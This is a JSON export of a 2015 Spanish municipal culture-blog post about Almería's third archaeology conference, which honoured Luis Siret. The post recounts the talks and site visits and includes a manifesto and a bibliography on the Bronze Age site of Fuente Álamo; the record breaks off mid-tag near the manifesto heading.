{"id":1714,"date":"2015-12-11T13:06:06","date_gmt":"2015-12-11T13:06:06","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=1714"},"modified":"2015-12-18T12:03:53","modified_gmt":"2015-12-18T12:03:53","slug":"almeria-un-museo-a-cielo-abierto","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2015\/12\/11\/almeria-un-museo-a-cielo-abierto\/","title":{"rendered":"ALMER\u00cdA. UN MUSEO A CIELO ABIERTO"},"content":{"rendered":"<p class=\"western\"><a href=\"http:\/\/www.dipalme.org\/Servicios\/Fiestas\/Fiestas.nsf\/Novedades\/03ABDB134105B9C8C1257EF500358842\" target=\"_blank\"><span style=\"color: #0000ff\"><span style=\"color: #000000\"><i><b>III JORNADAS ARQUEOL\u00d3GICAS. ALMER\u00cdA, UN MUSEO A CIELO ABIERTO <\/b><\/i><\/span><\/span><b> <\/b><span style=\"color: #0000ff\"><span style=\"color: #000000\"><i><b>EL LEGADO ARQUEOL\u00d3GICO DE LUIS SIRET<\/b><\/i><\/span><\/span><\/a><\/p>\n<p class=\"western\"><!--more--><\/p>\n<p class=\"western\" align=\"right\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Domingo-Ortiz-2012.jpg\"><img decoding=\"async\" class=\"alignnone size-full wp-image-1734\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Domingo-Ortiz-2012.jpg\" alt=\"Domingo Ortiz 2012\" width=\"160\" height=\"264\" \/><\/a><\/p>\n<p class=\"western\" align=\"right\"><span style=\"color: #333333\"><span style=\"font-size: small\">Domingo Ortiz Soler<\/span><\/span><\/p>\n<p class=\"western\" align=\"right\"><span style=\"color: #333333\"><span style=\"font-size: small\">Museo Hist\u00f3rico Municipal<\/span><\/span> del Ayuntamiento de Vera<\/p>\n<p class=\"western\">Recientemente se han celebrado las <a href=\"http:\/\/www.dipalme.org\/Servicios\/Fiestas\/Fiestas.nsf\/Novedades\/03ABDB134105B9C8C1257EF500358842\" target=\"_blank\"><span style=\"color: #0000ff\"><span style=\"color: #000000\"><i>III JORNADAS ARQUEOL\u00d3GICAS. ALMER\u00cdA, UN MUSEO A CIELO ABIERTO <\/i><\/span><\/span> <span style=\"color: #0000ff\"><span style=\"color: #000000\"><i>EL LEGADO ARQUEOL\u00d3GICO DE LUIS SIRET<\/i><\/span><\/span><\/a>, organizadas por el Instituto de Estudios Almerienses de la Diputaci\u00f3n Provincial, <span style=\"font-family: Calibri,Times New Roman,serif\">que se ha desarrollado desde el 25 al 28 de noviembre de 2015<\/span><span style=\"font-family: Calibri,Times New Roman,serif\"><span style=\"font-size: large\">, <\/span><\/span><span style=\"color: #2f2f2f\">al ser Siret el m\u00e1ximo representante de la arqueolog\u00eda almerienses, pionero en el descubrimientos de las culturas m\u00e1s antiguas de Europa en nuestra tierra.<\/span><\/p>\n<p class=\"western\">Louis Siret Cels (1860-1934) representa para Almer\u00eda la memoria arqueol\u00f3gica de su Prehistoria. Trasladado a Cuevas del Almanzora en 1881, compagin\u00f3 junto a su hermano Henri la ingenier\u00eda con el trabajo de arque\u00f3logo, realizando excavaciones pioneras en yacimientos emblem\u00e1ticos como Campos, Tres Cabezos y Fuente \u00c1lamo, y en otros municipios, existiendo en el Archivo Municipal de Vera, documentaci\u00f3n sobre \u00e9l. En Vera tambi\u00e9n descubri\u00f3 la villa romana del Roceip\u00f3n (publicado en 1908 en su libro <em>Villaricos y Herrer\u00edas<\/em>. <i>Antig\u00fcedades p\u00fanicas, romanas, visig\u00f3ticas y \u00e1rabes<\/i>) existiendo tambi\u00e9n yacimientos arg\u00e1ricos en el cerro del Esp\u00edritu Santo y el cabezo del Pajarraco. Fruto de \u00e9stas y otras excavaciones realizadas durante 7 a\u00f1os en diferentes municipios, editan <i>Les premiers \u00c2ges du M\u00e9tal dans le Sud-Est de l\u2019Espagna<\/i> (Amberes, 1887), la primera obra de arqueolog\u00eda cient\u00edfica que sistematiza la prehistoria del SE siendo galardonada con el premio Martorell y las medallas de oro en la Exposiciones Internacionales de Toulouse (1887) y Barcelona (1888).<\/p>\n<p class=\"western\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-full wp-image-1716\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art.jpg\" alt=\"Art\" width=\"212\" height=\"296\" \/><\/a> <a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto.jpg\"><img decoding=\"async\" class=\"alignnone size-full wp-image-1718\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto.jpg\" alt=\"Art blog Almeria Museo abierto\" width=\"199\" height=\"277\" \/><\/a><br \/>\nHasta el final de sus d\u00edas, L. Siret dedic\u00f3 52 a\u00f1os de su vida a desentra\u00f1ar el pasado, dejando un legado dif\u00edcil de superar. De unos 503 yacimientos excavados, lleg\u00f3 a reunir una rica colecci\u00f3n arqueol\u00f3gica formada por unas 129.000 piezas que don\u00f3 al Estado espa\u00f1ol. El fondo documental existente en su archivo personal, custodiado en m\u00e1s de 70 cajas y 18 carpetas, est\u00e1 considerado uno de los m\u00e1s importantes para el estudio de los yacimientos prehist\u00f3ricos en el sureste de la Pen\u00ednsula Ib\u00e9rica. Su catalogaci\u00f3n y digitalizaci\u00f3n ha sido un trabajo \u00edmprobo desarrollado por el Museo Arqueol\u00f3gico Nacional (MAN) que durante este a\u00f1o lo ha puesto al servicio de la ciudadan\u00eda a trav\u00e9s de la red.<\/p>\n<p class=\"western\">Estas terceras Jornadas, est\u00e1n dedicadas a este importante legado arqueol\u00f3gico y documental de Siret conservado en el Museo Arqueol\u00f3gico Nacional conocido como \u2018Colecci\u00f3n SIRET\u2019, en las que tambi\u00e9n se ha hablado de la documentaci\u00f3n de su ayudante de campo Pedro Flores y de su colaborador Juan Cuadrado Ruiz.<\/p>\n<p class=\"western\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-Jornadas-Almer\u00eda-un-Museo-a-cielo-abierto.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1732\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-Jornadas-Almer\u00eda-un-Museo-a-cielo-abierto.jpg\" alt=\"Art Jornadas Almer\u00eda un Museo a cielo abierto\" width=\"277\" height=\"272\" \/><\/a><\/p>\n<p class=\"western\" align=\"center\"><span style=\"font-size: small\"><i>Lu\u00eds Siret y su colaborador Juan Cuadrado Ruiz en su casa de Herrer\u00edas<br \/>\n<\/i><\/span><\/p>\n<p class=\"western\"><span style=\"font-size: large\"><b>Desarrollo de las actividades<\/b><\/span><\/p>\n<p class=\"western\">Estas<i> terceras jornadas, Almer\u00eda, un museo abierto<\/i>, est\u00e1n dedicadas al importante legado arqueol\u00f3gico y documental de Siret conservado en el Museo Arqueol\u00f3gico Nacional conocido como \u201c<i>Colecci\u00f3n Siret<\/i>\u201d.<br \/>\nAportaron sus conocimientos sobre este importante legado almeriense dos expertas del <b>Museo Arqueol\u00f3gico Nacional<\/b>, <i>D\u00aa Carmen Cacho Quesada, <\/i>Conservadora Jefe del Departamento de Prehistoria del Museo Arqueol\u00f3gico Nacional y <i>D\u00aa Virginia Salve Quejido, <\/i>Conservadora Jefe de Departamento de Documentaci\u00f3n.<br \/>\nTambi\u00e9n han intervenido historiadores\/as y arque\u00f3logos\/as vinculados\/as a nuestra provincia como D. Juan Grima Cervantes, D. Arturo del Pino Ruiz, D. Enrique Fern\u00e1ndez Bolea, D. Domingo Ortiz Soler, D\u00aa Laura Larios Boqu\u00e9 y el coordinador de las jornadas<\/p>\n<p class=\"western\">Las actividades de conferencias de mi\u00e9rcoles y jueves se desarrollaron en la UNED de Almer\u00eda, las del viernes en el Museo Arqueol\u00f3gico y la clausura del s\u00e1bado en Cuevas del Almanzora.<\/p>\n<p class=\"western\">El mi\u00e9rcoles 25 de noviembre, por la tarde, se expusieron dos sendas conferencias sobre este importante legado almeriense, con dos expertas del <b>Museo Arqueol\u00f3gico Nacional<\/b>, <i>D\u00aa Carmen Cacho Quesada, <\/i>Conservadora Jefe del Departamento de Prehistoria del Museo Arqueol\u00f3gico Nacional, con el tema \u201c<i>La colecci\u00f3n Siret en el MAN. Un referente para la investigaci\u00f3n de la Prehistoria espa\u00f1ola<\/i>\u201d.<\/p>\n<p class=\"western\">La investigadora Carmen cacho, tambi\u00e9n ha desarrollado excavaciones arqueol\u00f3gicas sobre el paleol\u00edtico en la cueva de los Murci\u00e9lagos de Lubrin, conociendo esta etapa m\u00e1s antigua del poblamiento en nuestra comarca, que hasta ahora se encuentra poco estudiado cient\u00edficamente, as\u00ed como pr\u00e1cticamente apenas difundido.<\/p>\n<p class=\"western\"><i>D\u00aa Virginia Salve Quejido, <\/i>Conservadora Jefe de Departamento de Documentaci\u00f3n, expuso el tema sobre \u201c<i>El Archivo Siret: gesti\u00f3n documental en el Museo Arqueol\u00f3gico para su puesta en valor<\/i>\u201d. Esta investigadora ya estuvo colaborando con nosotros en las excavaciones de la villa romana del Roceip\u00f3n (Vera), en 1982, como alumna del Campo de trabajo que se llev\u00f3 a cabo en aquellas fechas, cuando los estudiantes se alojaban en el edificio del Internado.<\/p>\n<p class=\"western\">Por la tarde, se desarrollaron la conferencia del historiador Juan Grima que habl\u00f3 del \u201c<i>Legado de Luis Siret donado al estado Espa\u00f1ol<\/i>\u201d, una exhaustiva exposici\u00f3n de documentos originales sobre este personaje, as\u00ed como fotograf\u00edas de la \u00e9poca.<\/p>\n<p class=\"western\">A continuaci\u00f3n el historiador Juan Alberto Cano expuso novedosos datos en su conferencia \u201c<i>Materiales ib\u00e9ricos de Villaricos en la Exposici\u00f3n Internacional de Barcelona (1929): la colecci\u00f3n Siret a trav\u00e9s de la fotograf\u00eda en Blanco y negro<\/i>\u201d, donde reclam\u00f3 nuevas investigaciones y actualizaciones de datos sobre la cultura ib\u00e9rica en nuestro territorio almeriense, sobre todo en la fundaci\u00f3n de la antigua ciudad en Villaricos, posteriormente conocida por los romanos como Baria, origen de lo que ser\u00eda posteriormente en el siglo IX d.C. Bayra (Vera). Todo ello debido a que en la historiograf\u00eda sobre el poblamiento ibero en nuestra tierra ha sido poco considerado en las investigaciones de anta\u00f1o y en las actuales.<\/p>\n<p class=\"western\">El viernes, a medio d\u00eda, se continu\u00f3 con las actividades en el Museo Arqueol\u00f3gico de Almer\u00eda, donde su director, Arturo del Pino Ruiz, realiz\u00f3 a todos los asistentes una <i>visita a los almacenes, fondos y colecciones del Museo<\/i>, donde mostr\u00f3 una selecci\u00f3n de importantes objetos arqueol\u00f3gicos encontrados en nuestra comarca.<\/p>\n<p class=\"western\">Entre ellas aparecen algunas piezas de Vera.<\/p>\n<p class=\"western\">El s\u00e1bado se celebr\u00f3 la clausura de estas Jornadas en Cuevas del Almanzora, donde durante todo el d\u00eda, los asistentes (unas 170 personas), acudieron a un \u201c<i>Itinerario por el paisaje, territorio y los yacimientos siretianos de Cuevas del Almanzora<\/i>\u201d.<\/p>\n<p class=\"western\">Por la ma\u00f1ana, el concejal de Cultura y Turismo Indalecio Modesto, decepcion\u00f3 en el castillo a los asistentes. A continuaci\u00f3n una visita al Museo Arqueol\u00f3gico y una visita al Dep\u00f3sito de agua proyectado por los Hermanos Siret, conducido por el cronista de la Ciudad Enrique Fern\u00e1ndez Bolea.<\/p>\n<p class=\"western\">Despu\u00e9s una ruta guiada al yacimiento arqueol\u00f3gico de Fuente \u00c1lamo, en sierra de Almagro, descubierto por Siret, y excavado por el Instituto Arqueol\u00f3gico Alem\u00e1n desde 1977 a 1982, , y que fue explicado por Domingo Ortiz, colaborador de dicho Instituto, donde particip\u00f3 en varias campa\u00f1as de excavaciones. Las ruinas fueron dejadas al descubierto, tras un proyecto de consolidaci\u00f3n de estructuras de muros de edificaciones y de tumbas, para poder ser visitado, actualmente en lamentable estado de conservaci\u00f3n y abandono. Tras este estado de cosas se ley\u00f3 ante los asistentes un <i>Manifiesto<\/i> en defensa de dicho lugar arqueol\u00f3gico, que adjuntamos a continuaci\u00f3n.<\/p>\n<p class=\"western\">Por la tarde continu\u00f3 la vista a la Iglesia de la Sagrada familia de Herrer\u00edas, dise\u00f1ada y construida por Siret en 1905, restaurada y puesta en uso religioso para los feligreses de esta barriada.Y para finalizar, se visit\u00f3 la casa de Lu\u00eds Siret, en Las Rozas y la visita a la necr\u00f3polis (hipogeos) ibero-p\u00fanica de Villaricos, conducida por la arque\u00f3loga laura Larios, explicando D. Ortiz las excavaciones que realiz\u00f3 en una domus romana.<\/p>\n<p class=\"western\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blogAlmeria-Museo-abierto.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1730\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blogAlmeria-Museo-abierto-300x220.jpg\" alt=\"Art blogAlmeria Museo abierto\" width=\"300\" height=\"220\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blogAlmeria-Museo-abierto-300x220.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blogAlmeria-Museo-abierto-1024x750.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p class=\"western\"><span style=\"color: #3e3e3e\"><span style=\"font-size: small\"><i>Equipo de trabajo en los hipogeos ibero-p\u00fanicos de Villaricos dirigido por Josefa Almagro en 1978<\/i><\/span><\/span><\/p>\n<p class=\"western\">La clausura de las jornadas se realizaron en el Sal\u00f3n Social de Herrer\u00edas con una actuaci\u00f3n de la cantautora Sensi Fal\u00e1n; recibiendo a continuaci\u00f3n un regalo a los asistentes de una jarra conmemorativa de estas Jornadas, especialmente dise\u00f1ada para este evento.<\/p>\n<p class=\"western\">Con ello, finalizaron estas actividades, con un \u00e9xito de asistencia, m\u00e1s de lo esperado, debido al gran inter\u00e9s que suscita la figura de Luis Siret y la Arqueolog\u00eda en nuestra provincia.<\/p>\n<p class=\"western\">Las Jornadas las organiza el Departamento de Historia del Instituto de Estudios Almerienses y la coordinaci\u00f3n corre a cargo de Juan Alberto Cano Garc\u00eda. Colaboran: Centro Asociado de la UNED de Almer\u00eda, Concejal\u00eda de Cultura y Turismo del Ayuntamiento de Cuevas del Almanzora y Museo de Almer\u00eda de la Consejer\u00eda de Cultura de la Junta de Andaluc\u00eda.<\/p>\n<p class=\"western\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-AlmeriaMuseo-abierto.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1729\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-AlmeriaMuseo-abierto-300x175.jpg\" alt=\"Art blog AlmeriaMuseo abierto\" width=\"300\" height=\"175\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-AlmeriaMuseo-abierto-300x175.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-AlmeriaMuseo-abierto.jpg 553w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p class=\"western\"><span style=\"font-size: large\">Manifiesto en defensa de Fuente \u00c1lamo<\/span><\/p>\n<p class=\"western\">UN PROYECTO SINGULAR EN FUENTE \u00c1LAMO<\/p>\n<p align=\"justify\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: medium\">Las primeras noticias e investigaciones fueron realizadas por los hermanos Siret, no reanud\u00e1ndose las excavaciones hasta los a\u00f1os 1977\u00a0y\u00a01979 en que dimos a conocer este yacimiento al arque\u00f3logo Oswaldo Arteaga e Instituto Arqueol\u00f3gico Alem\u00e1n, cuyos resultados han sido conocidos a trav\u00e9s de diversas publicaciones, a partir de los trabajos de excavaciones dirigidos por el Dr. Schubart.<\/span><\/span><\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blogAlmeria-Museo-abierto..jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1731\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blogAlmeria-Museo-abierto.-300x220.jpg\" alt=\"Art blogAlmeria Museo abierto.\" width=\"300\" height=\"220\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blogAlmeria-Museo-abierto.-300x220.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blogAlmeria-Museo-abierto.-1024x749.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p align=\"center\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: small\"><i>Algunos miembros del equipo en 1977<\/i><\/span><\/span><\/p>\n<p align=\"justify\"><span style=\"font-family: Arial,sans-serif\"><span style=\"font-size: small\"><strong><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">Objetivos <\/span><\/span><\/strong><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: medium\">Uno de los objetivos principales del Proyecto Fuente \u00c1lamo es la investigaci\u00f3n arqueol\u00f3gica del poblamiento arg\u00e1rico en el Sudeste de la Pen\u00ednsula Ib\u00e9rica, a la luz de la secuencia estratigr\u00e1fica de Fuente \u00c1lamo (Cuevas de Almanzora, Almer\u00eda), desde las primeras investigaciones de Siret hasta hoy.<\/span><\/span><b> <\/b><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: medium\">El proyecto fue autorizado por la Direcci\u00f3n General de Bienes Culturales de la Consejer\u00eda de Cultura de la Junta de Andaluc\u00eda y financiado por el Instituto Arqueol\u00f3gico Alem\u00e1n de Madrid. Su direcci\u00f3n ha corrido a cargo de Hermanfrid Schubart y Oswaldo Arteaga Matute desde 1977, con la incorporaci\u00f3n de Volker Pingel (Universidad de Bochum, Alemania) a partir de 1985.<\/span><\/span><\/span><\/span><\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto...jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1719\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto..-300x204.jpg\" alt=\"Art blog Almeria Museo abierto..\" width=\"300\" height=\"204\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto..-300x204.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto...jpg 946w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p class=\"western\" align=\"center\"><span style=\"font-size: small\"><i>Oswaldo Arteaga y el profesor Schubart, durante el an\u00e1lisis del ajuar de una tumba en cista, con una cer\u00e1mica lenticular.<\/i><\/span><\/p>\n<p align=\"justify\"><span style=\"font-family: Arial,sans-serif\"><span style=\"font-size: small\"><strong><span style=\"font-size: medium\">Contribuci\u00f3n al Progreso del Conocimiento Hist\u00f3rico<\/span><\/strong><\/span><\/span><\/p>\n<p class=\"western\" align=\"justify\">El \u00abProyecto Fuente \u00c1lamo\u00bb contribuye a la superaci\u00f3n de los paradigmas hist\u00f3rico-culturales que desde los tiempos de Luis Siret ven\u00edan siendo reciclados sin profundizar en el estudio de la \u00ab<i>Econom\u00eda Pol\u00edtica<\/i>\u00bb de la sociedad arg\u00e1rica, y sin desarrollar un estudio parangonable con el impacto antr\u00f3pico de dicha cultura con respecto de la transformaci\u00f3n de la naturaleza del Sudeste peninsular durante la Edad del Bronce.<\/p>\n<p class=\"western\" align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto....jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1720\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto...-300x236.jpg\" alt=\"Art blog Almeria Museo abierto...\" width=\"300\" height=\"236\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto...-300x236.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto....jpg 477w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p class=\"western\" align=\"center\"><span style=\"font-size: small\"><i>Enterramiento arg\u00e1rico en cista con el ajuar funerario de espada, cuchillo, alabarda, cuenco y olla lenticular<\/i><\/span><\/p>\n<p class=\"western\" align=\"justify\">En cuanto a las excavaciones arqueol\u00f3gicas practicadas en Fuente \u00c1lamo desde 1977 hasta nuestros d\u00edas (Schubart, Pingel, Arteaga, 2000), han quedado puestas en evidencia las caracter\u00edsticas urbanas propias de un poblado de altura, en particular ubicado en el \u00e1rea nuclear del territorio arg\u00e1rico. Permitiendo los resultados obtenidos a partir del a\u00f1o 1984 (Schubart y Arteaga, en Homenaje a Luis Siret, Sevilla, 1986) postular por primera vez respecto de la prehistoria de la Pen\u00ednsula Ib\u00e9rica la existencia de una \u00absociedad clasista inicial\u00bb (Arteaga, 1992), mostrativa de la aparici\u00f3n del Estado en el Sudeste (Arteaga, 2000).<\/p>\n<p class=\"western\" align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto......jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1722\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto.....-300x213.jpg\" alt=\"Art blog Almeria Museo abierto.....\" width=\"300\" height=\"213\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto.....-300x213.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto.....-1024x727.jpg 1024w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto......jpg 1259w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p class=\"western\" align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto.....jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1721\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto.....jpg\" alt=\"Art blog Almeria Museo abierto....\" width=\"254\" height=\"152\" \/><\/a><\/p>\n<p class=\"western\" align=\"center\"><span style=\"font-size: small\"><i>Estructuras constructivas en la acr\u00f3polis<\/i><\/span><\/p>\n<p align=\"justify\"><span style=\"font-family: Arial,sans-serif\"><span style=\"font-size: small\"><strong><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">Selecci\u00f3n bibliogr\u00e1f\u00edca<\/span><\/span><\/strong><\/span><\/span><\/p>\n<p align=\"justify\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: medium\">Aparte de la numerosa bibliograf\u00eda proporcionada por las excavaciones practicadas hasta el presente, sobre Fuente \u00c1lamo, se pueden consultar:<\/span><\/span><\/p>\n<p align=\"justify\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: medium\">&#8211; O. ARTEAGA y H. SCHUBART.\u00bbFuente \u00c1lamo. Excavaciones de 1977&#8243;. Noticiario Arqueol\u00f3gico Hisp\u00e1nico, 9. Madrid, 1980: 247-289.<\/span><\/span><\/p>\n<p align=\"justify\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: medium\">&#8211; O. ARTEAGA y H. SCHUBART. \u00abFundamentos arqueol\u00f3gicos para el estudio socio-econ\u00f3mico y cultural de El Argar\u00bb. Homenaje a Luis Siret. Cuevas de Almanzora, 1984. Sevilla, 1986: 289-307.<\/span><\/span><\/p>\n<p align=\"justify\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: medium\">&#8211; O. ARTEAGA. \u00abTribalizaci\u00f3n, jerarquizaci\u00f3n y Estado en el territorio de El Argar\u00bb. Spal, 1. Sevilla, 1992: 179-208.<\/span><\/span><\/p>\n<p align=\"justify\"><span style=\"font-family: Arial,sans-serif\"><span style=\"font-size: small\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: medium\">&#8211; H. SCHUBART, V. PINGEL, O. ARTEAGA. \u00abFuente \u00c1lamo\u00bb. <\/span><\/span><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: medium\"><span lang=\"en-GB\">Vorbericht \u00fcber die Grabung 1991 in der bronzezeitlichen H\u00f6hensiedlung. <\/span><\/span><\/span><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: medium\">Madrider Mitteilungen, 34. Mainz, 1998: 14-34.<\/span><\/span><\/span><\/span><\/p>\n<p align=\"justify\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: medium\">&#8211; H. SCHUBART, V. PINGEL, O. ARTEAGA. \u00abFuente \u00c1lamo. Las excavaciones arqueol\u00f3gicas 1977-1991 en el poblado de la Edad del Bronce\u00bb. Arqueolog\u00eda Monograf\u00edas. Junta de Andaluc\u00eda. Consejer\u00eda de Cultura. Sevilla. 2000.<\/span><\/span><\/p>\n<p align=\"justify\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: medium\">&#8211; O. ARTEAGA. \u00abLa sociedad clasista inicial y el origen del Estado en el territorio de El Argar\u00bb. Revista Atl\u00e1ntica-Mediterr\u00e1nea de Prehistoria y Arqueolog\u00eda Social, 3. Universidad de C\u00e1diz, 2000: 121-219.<\/span><\/span><\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto.......jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1723\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto......-300x207.jpg\" alt=\"Art blog Almeria Museo abierto......\" width=\"300\" height=\"207\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto......-300x207.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto.......jpg 677w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p class=\"western\" align=\"center\"><span style=\"font-size: small\"><i>Topografiando la c\u00faspide del cerro donde se ubica la acr\u00f3polis y necr\u00f3polis<\/i><\/span><\/p>\n<p class=\"western\" align=\"center\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto........jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1724\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto.......-300x207.jpg\" alt=\"Art blog Almeria Museo abierto.......\" width=\"300\" height=\"207\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto.......-300x207.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto........jpg 674w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p class=\"western\"><span style=\"color: #333333\"><span style=\"font-family: Arial,sans-serif\"><span style=\"font-size: large\">MANIFIESTO<\/span><\/span><\/span><\/p>\n<p class=\"western\"><span style=\"color: #333333\"><span style=\"font-family: Arial,sans-serif\"><b>A COLACI\u00d3N DE LA VISITA GUIADA A ESTE IMPORTANTE POBLADO ARG\u00c1RICO DENTRO DE LAS <\/b><\/span><\/span><span style=\"color: #333333\"><span style=\"font-family: Arial,sans-serif\"><i><b>III JORNADAS DE ARQUEOLOG\u00cdA. ALMERIA UN MUSEO A CIELO ABIERTO<\/b><\/i><\/span><\/span><\/p>\n<p class=\"western\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto.........jpg\"><img loading=\"lazy\" 